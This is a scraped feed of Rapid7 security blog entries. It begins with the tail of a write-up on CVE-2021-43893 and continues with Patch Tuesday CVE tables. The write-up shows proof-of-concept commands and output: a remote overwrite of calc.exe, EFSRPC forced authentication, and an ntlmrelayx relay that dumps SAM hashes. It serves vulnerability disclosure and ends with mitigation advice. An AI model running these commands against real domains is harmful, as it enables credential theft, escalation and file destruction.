to note that the administrative user can remotely overwrite all files. This doesn\u2019t serve much purpose from an offensive standpoint, but would serve as an easy, low-effort [wiper](<https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/033/904/original/Talos_WiperWhitepaper.v3.pdf?1525893980>) or data destruction attack. Here is a silly example of remotely overwriting calc.exe from an administrator account.\n \n \n C:\\ProgramData>whoami\n okhuman\\test_admin\n \n C:\\ProgramData>.\\blankspace.exe -r vulnerable.okhuman.ninja -f \\\\.\\C:\\Windows\\System32\\calc.exe -s \"aaaaaaaaaaaa\"\n ____ ___ __ ____\n /\\ _`\\ /\\_ \\ /\\ \\ /\\ _`\\\n \\ \\ \\L\\ \\//\\ \\ __ ___\\ \\ \\/'\\ \\ \\,\\L\\_\\ _____ __ ___ __\n \\ \\ _ <'\\ \\ \\ /'__`\\ /' _ `\\ \\ , < \\/_\\__ \\ /\\ '__`\\ /'__`\\ /'___\\ /'__`\\\n \\ \\ \\L\\ \\\\_\\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\ \\ \\\\`\\ /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\.\\_/\\ \\__//\\ __/\n \\ \\____//\\____\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\ \\_\\ \\ `\\____\\ \\ ,__/\\ \\__/.\\_\\ \\____\\ \\____\\\n \\/___/ \\/____/\\/__/\\/_/\\/_/\\/_/\\/_/\\/_/ \\/_____/\\ \\ \\/ \\/__/\\/_/\\/____/\\/____/\n \\ \\_\\\n \\/_/\n [+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja\n [+] Attempting to write to \\\\.\\C:\\Windows\\System32\\calc.exe\n [+] Encrypt the empty remote file...\n [-] EfsRpcEncryptFileSrv failed with status code: 5\n \n C:\\ProgramData>\n \n\nAs you can see from the output, the tool failed with status code 5 (Access Denied). However, `calc.exe` on the remote device was successfully overwritten.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image5.png)\n\nTechnically speaking, this doesn\u2019t really represent a security boundary being crossed. Administrators typically have access to \\host\\C$ or \\host\\admin$, but the difference in behavior seemed worth mentioning. I\u2019d also note that as of February 2022, administrative users can still do this using `\\\\localhost\\C$\\Windows\\System32\\calc.exe`.\n\nForshaw also mentioned in his original writeup, and I confirmed, that this attack generates the attacking user\u2019s roaming profile on the victim server. That could be a pretty interesting file-upload vector if the Active Directory environment synchronizes roaming directories. Again, I didn\u2019t investigate that any further, but it could be useful in the correct environment.\n\n### Forced authentication still not entirely patched\n\nThe December 2021 patch brought multiple changes to `efslsaext.dll` and resulted in partial mitigation of [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>). One of the changes was the introduction of two new functions: `EfsEnsureLocalPath` and `EfsEnsureLocalHandle`. `EfsEnsureLocalPath` grabs a HANDLE for the attacker provided file using [CreateW](<https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew>). The HANDLE is then passed to `EfsEnsureLocalHandle`, which passes the HANDLE to `NtQueryVolumeInformationFile` to validate the characteristics flag doesn\u2019t contain [FILE_REMOTE_DEVICE](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/616b66d5-b335-4e1c-8f87-b4a55e8d3e4a>).\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image7.png)\n\nBecause the patch **still** opens a HANDLE using the attacker-controlled file path, EFSRPC _remains_ vulnerable to forced authentication and relay attacks of the machine account.\n\nDemonstration of the forced authentication and relay does not require the complicated attack often associated with PetitPotam. We just need three boxes:\n\nThe Relay (10.0.0.3): A Linux system running `ntlmrelayx.py`. \nThe Attacker (10.0.0.6): A fully patched Windows 10 system. \nThe Victim (10.0.0.12): A fully patched Windows Server 2019 system.\n\nThe only caveat for this example is that the victim\u2019s machine account (aka [computer account](<https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/service-accounts-computer>)) is assigned to the `Domain Admins` group. Below, you can see the machine account for 10.0.0.12, YEET$, is a member of `Domain Admins`.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image9.png)\n\nThis may not be a common configuration, but it\u2019s common enough that it\u2019s been the subject of a [couple](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts>) [excellent](<https://pentestlab.blog/2022/02/01/machine-accounts/>) writeups.\n\nThe attack is launched by a low-privileged user on 10.0.0.6 using the `blankspace.exe` proof of concept. The attack will force 10.0.0.12 (yet.okhuman.ninja) to authenticate to the attacker relay at 10.0.0.3\n \n \n C:\\ProgramData>blankspace.exe -r yeet.okhuman.ninja -f \\\\10.0.0.3\\r7\\r7 --relay\n ____ ___ __ ____\n /\\ _`\\ /\\_ \\ /\\ \\ /\\ _`\\\n \\ \\ \\L\\ \\//\\ \\ __ ___\\ \\ \\/'\\ \\ \\,\\L\\_\\ _____ __ ___ __\n \\ \\ _ <'\\ \\ \\ /'__`\\ /' _ `\\ \\ , < \\/_\\__ \\ /\\ '__`\\ /'__`\\ /'___\\ /'__`\\\n \\ \\ \\L\\ \\\\_\\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\ \\ \\\\`\\ /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\.\\_/\\ \\__//\\ __/\n \\ \\____//\\____\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\ \\_\\ \\ `\\____\\ \\ ,__/\\ \\__/.\\_\\ \\____\\ \\____\\\n \\/___/ \\/____/\\/__/\\/_/\\/_/\\/_/\\/_/\\/_/ \\/_____/\\ \\ \\/ \\/__/\\/_/\\/____/\\/____/\n \\ \\_\\\n \\/_/\n [+] Creating EFS RPC binding handle to yeet.okhuman.ninja\n [+] Sending EfsRpcDecryptFileSrv for \\\\10.0.0.3\\r7\\r7\n [-] EfsRpcDecryptFileSrv failed with status code: 53\n [+] Network path not found error received!\n [!] Success!\n \n C:\\ProgramData>\n \n\nThe Linux relay is running [ntlmrelayx.py](<https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/>) and configured to relay the YEET$ authentication to 10.0.0.6 (the original attacker box). Below, you can see `ntlmrelayx.py` capture the authentication and send it on to 10.0.0.6.\n \n \n albinolobster@ubuntu:~/impacket/examples$ sudo python3 ntlmrelayx.py -debug -t 10.0.0.6 -smb2support \n Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation\n \n [*] SMBD-Thread-4: Connection from OKHUMAN/YEET$@10.0.0.12 controlled, attacking target smb://10.0.0.6\n [*] Authenticating against smb://10.0.0.6 as OKHUMAN/YEET$ SUCCEED\n \n\nThe relay is now authenticated to 10.0.0.6 as `YEET$`, a domain administrator. It can do pretty much as it pleases. Below, you can see it dumps the local SAM database.\n \n \n [*] Target system bootKey: 0x9f868ddb4e1dfc56d992aa76ff931df4\n [+] Saving remote SAM database\n [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\n [+] Calculating HashedBootKey from SAM\n [+] NewStyle hashes is: True\n Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6aa01bb4a68e7fd8650cdeb6ad2b63ec:::\n [+] NewStyle hashes is: True\n albinolobster:1000:aad3b435b51404eeaad3b435b51404ee:430ef7587d6ac4410ac8b78dd5cc2bbe:::\n [*] Done dumping SAM hashes for host: 10.0.0.6\n \n\nIt\u2019s as easy as that. All you have to do is find a host with a machine account in the domain admins group:\n \n \n C:\\ProgramData>net group \"domain admins\" /domain\n The request will be processed at a domain controller for domain okhuman.ninja.\n \n Group name Domain Admins\n Comment Designated administrators of the domain\n \n Members\n \n -------------------------------------------------------------------------------\n Administrator test_domain_admin YEET$\n The command completed successfully.\n \n \n C:\\ProgramData>\n \n\nOnce you have that, a low-privileged remote attacker can use EFSRPC to relay and escalate to other machines. However, the attack isn\u2019t exactly silent. On 10.0.0.6, event ID 4624 was created when the 10.0.0.3 relay logged in using the YEET$ machine account.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image3-1.png)\n\n## Final thoughts and remediation\n\nWhat began as an investigation into using an unpatched remote file-write vulnerability ended up being a history lesson in EFSRPC patches. The remote file-write vulnerability that I originally wanted to use has been patched, but we demonstrated the forced authentication issue hasn\u2019t been adequately fixed. There is no doubt that Windows developers have a tough job. However, a lot of the issues discussed here could have been easily avoided with a reasonable patch in August 2021. The fact that they persist today says a lot about the current state of Windows security.\n\nTo mitigate these issues as best as possible, as always, ensure your systems are successfully updated monthly. Microsoft has released multiple advisories with recommendations regarding NTLM Relay-based attacks (see: [Microsoft Security Advisory 974926 \n](<https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2009/974926>) and [KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>). The most important advice is to ensure SMBv1 no longer exists in your environment and to require SMB signing.\n\nSome other general advice:\n\n * Monitoring for [event ID 4420](<https://support.microsoft.com/en-au/topic/kb5009763-efs-security-hardening-changes-in-cve-2021-43217-719fbc9d-ad9b-4f90-a964-0afe40338002>) in Windows application event logs can help detect EFSRPC-based hacking tools.\n * Monitor for [event ID 4624](<https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624>) in Windows security event logs for remote machine account authentication.\n * Audit machine accounts to ensure they are not members of Domain Admins. \nIf possible, audit %PATH% of critical systems to ensure no world-writable path exists.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2021-43893 with [authenticated vulnerability checks](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-43893/>) available in the December 15, 2021 content release.\n\nMetasploit Framework users can test their exposure to forced authentication attacks with a new [PetitPotam](<https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/dcerpc/petitpotam.rb>) module available in the 6.1.29 release.\n\n_**Additional reading:**_\n\n * _[PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)_\n * _[Driver-Based Attacks: Past and Present](<https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/>)_\n * _[Open-Source Security: Getting to the Root of the Problem](<https://www.rapid7.com/blog/post/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/>)_\n * _[Ongoing Exploitation of Windows Installer CVE-2021-41379](<https://www.rapid7.com/blog/post/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-14T15:30:52", "type": "rapid7blog", "title": "Dropping Files on a Domain Controller Using CVE-2021-43893", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43217", "CVE-2021-43893", "CVE-2021-44228"], "modified": "2022-02-14T15:30:52", "id": "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "href": "https://blog.rapid7.com/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-21T10:49:33", "description": "![Patch Tuesday - August 2021](https://blog.rapid7.com/content/images/2021/08/patches-2.jpg)\n\nHot off the press, it\u2019s another issue of the Patch Tuesday blog! While the number of vulnerabilities is low this month, there are a number of high risk items administrators will want to patch right away including a few that will require additional remediation steps. This Patch Tuesday also includes updates for three vulnerabilities that were publicly disclosed earlier this month. Let\u2019s jump in.\n\n## Windows Elevation of Privilege Vulnerability aka HiveNightmare/SeriousSAM\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934> \nWith a public proof-of-concept having been available for some time, administrators should prioritize taking action on CVE-2021-36934. Remediation for this vulnerability requires volume shadow copies for system files to be deleted. This is due to the nature of the vulnerability, as the files with the vulnerable permissions could be restored from a backup and accessed even after the patch is installed. Microsoft indicates they took caution not to delete users' backups, but the trade-off is that customers will need to do the chore themselves. We've updated [our blog post](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>) with this additional information.\n\n## Windows LSA Spoofing Vulnerability aka ADV210003\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942> \nAnother high priority action for patching teams is CVE-2021-36942. This update patches one of the vectors used in the PetitPotam attack. After applying this update there are additional configurations required in order to protect systems from other attack vectors using registry keys. The InsightVM team has included detection for the registry keys needed to enable EPA and SMB Signing in addition to the normal update. Please see [our blog post](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) for more information.\n\n## Windows Services for NFS ONCRPC XDR Driver Remote Code Execution Vulnerability\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26432> \nWhile Microsoft has not offered up any details for this vulnerability we can glean some info from the CVSS information. This remote code execution vulnerability is reachable from the network service with no authentication or user action required. There may not be an exploit available for this yet, but Microsoft indicates that \u201cExploitation [is] more likely\u201d. Put this update near the top of your TODO list.\n\n## Windows TCP/IP Remote Code Execution Vulnerability\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26424> \nLast on our list is a vulnerability that can result in remote execution on a Hyper-V host via the IPv6 networking stack. If Hyper-V is used in your environment this should be first on your list this month. \n\n## Summary Graphs\n\n![Patch Tuesday - August 2021](https://blog.rapid7.com/content/images/2021/08/output_26_1.png)![Patch Tuesday - August 2021](https://blog.rapid7.com/content/images/2021/08/output_25_1.png)![Patch Tuesday - August 2021](https://blog.rapid7.com/content/images/2021/08/output_20_2.png)![Patch Tuesday - August 2021](https://blog.rapid7.com/content/images/2021/08/output_18_2.png)\n\n## Summary Tables\n\n## Azure Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36949](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36949>) | Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability | No | No | 7.1 | Yes \n[CVE-2021-26428](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26428>) | Azure Sphere Information Disclosure Vulnerability | No | No | 4.4 | Yes \n[CVE-2021-26429](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26429>) | Azure Sphere Elevation of Privilege Vulnerability | No | No | 7.7 | Yes \n[CVE-2021-26430](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26430>) | Azure Sphere Denial of Service Vulnerability | No | No | 6 | Yes \n[CVE-2021-33762](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33762>) | Azure CycleCloud Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36943](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36943>) | Azure CycleCloud Elevation of Privilege Vulnerability | No | No | 4 | No \n \n## Browser Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-30597](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30597>) | Chromium: CVE-2021-30597 Use after free in Browser UI | No | No | | Yes \n[CVE-2021-30596](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30596>) | Chromium: CVE-2021-30596 Incorrect security UI in Navigation | No | No | | Yes \n[CVE-2021-30594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30594>) | Chromium: CVE-2021-30594 Use after free in Page Info UI | No | No | | Yes \n[CVE-2021-30593](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30593>) | Chromium: CVE-2021-30593 Out of bounds read in Tab Strip | No | No | | Yes \n[CVE-2021-30592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30592>) | Chromium: CVE-2021-30592 Out of bounds write in Tab Groups | No | No | | Yes \n[CVE-2021-30591](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30591>) | Chromium: CVE-2021-30591 Use after free in File System API | No | No | | Yes \n[CVE-2021-30590](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30590>) | Chromium: CVE-2021-30590 Heap buffer overflow in Bookmarks | No | No | | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34532](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34532>) | ASP.NET Core and Visual Studio Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34485>) | .NET Core and Visual Studio Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-26423](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26423>) | .NET Core and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36946>) | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 5.4 | No \n[CVE-2021-34524](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34524>) | Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability | No | No | 8.1 | No \n[CVE-2021-36950](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36950>) | Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | No | No | 5.4 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36941](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36941>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-36940](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36940>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-34478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34478>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34471>) | Microsoft Windows Defender Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26426](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26426>) | Windows User Account Profile Picture Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36948>) | Windows Update Medic Service Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-26432](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26432>) | Windows Services for NFS ONCRPC XDR Driver Remote Code Execution Vulnerability | No | No | 9.8 | No \n[CVE-2021-26433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26433>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36926](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36926>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36932>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36933](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36933>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26431](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26431>) | Windows Recovery Environment Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34534](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34534>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34530>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34486](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34486>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34487](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34487>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36938>) | Windows Cryptographic Primitives Library Information Disclosure Vulnerability | No | No | 5.5 | No \n[CVE-2021-36945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36945>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-34536](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34536>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34484>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26424](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26424>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-36936](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36936>) | Windows Print Spooler Remote Code Execution Vulnerability | No | Yes | 8.8 | No \n[CVE-2021-36947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36947>) | Windows Print Spooler Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-34483](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34483>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36937](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36937>) | Windows Media MPEG-4 Video Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-36942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36942>) | Windows LSA Spoofing Vulnerability | No | Yes | 7.5 | Yes \n[CVE-2021-34533](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34533>) | Windows Graphics Component Font Parsing Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-26425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26425>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36927>) | Windows Digital TV Tuner device registration application Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34537](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34537>) | Windows Bluetooth Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34480](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34480>) | Scripting Engine Memory Corruption Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34535](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34535>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes", "cvss3": {}, "published": "2021-08-11T03:19:33", "type": "rapid7blog", "title": "Patch Tuesday - August 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26423", "CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26428", "CVE-2021-26429", "CVE-2021-26430", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-30590", "CVE-2021-30591", "CVE-2021-30592", "CVE-2021-30593", "CVE-2021-30594", "CVE-2021-30596", "CVE-2021-30597", "CVE-2021-33762", "CVE-2021-34471", "CVE-2021-34478", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34485", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34524", "CVE-2021-34530", "CVE-2021-34532", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36934", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36940", "CVE-2021-36941", "CVE-2021-36942", "CVE-2021-36943", "CVE-2021-36945", "CVE-2021-36946", "CVE-2021-36947", "CVE-2021-36948", "CVE-2021-36949", "CVE-2021-36950"], "modified": "2021-08-11T03:19:33", "id": "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD", "href": "https://blog.rapid7.com/2021/08/11/patch-tuesday-august-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-10T00:48:57", "description": "![Patch Tuesday - February 2021](https://blog.rapid7.com/content/images/2021/02/patches-2.jpg)\n\nThe second Patch Tuesday of 2021 is relatively light on the vulnerability count, with 64 CVEs being addressed across the majority of Microsoft\u2019s product families. Despite that, there\u2019s still plenty to discuss this month.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 28 \nESU | 14 \nMicrosoft Office | 11 \nBrowser | 9 \nDeveloper Tools | 8 \nMicrosoft Dynamics | 2 \nExchange Server | 2 \nAzure | 2 \nSystem Center | 2 \n \n### Exploited and Publicly Disclosed Vulnerabilities\n\nOne zero-day was announced: [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>) is a privilege elevation vulnerability affecting the Win32k component of Windows 10 and Windows Server 2019, reported to be exploited in the wild. Four vulnerabilities have been previously disclosed: [CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>), a privilege elevation vulnerability in Windows Installer, affecting all supported versions of Windows; [CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>), which is a denial of service (DoS) affecting Windows 10 and Server 2019; [CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>), an information disclosure vulnerability affecting DirectX in Windows 10 and Server 2019; and [CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>), an RCE in .NET Core.\n\n### Vulnerabilities in Windows TCP/IP\n\nMicrosoft also disclosed a set of [three serious vulnerabilities](<https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/>) affecting the TCP/IP networking stack in all supported versions of Windows. Two of these ([CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) and [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>)) carry a base CVSSv3 score of 9.8 and could allow Remote Code 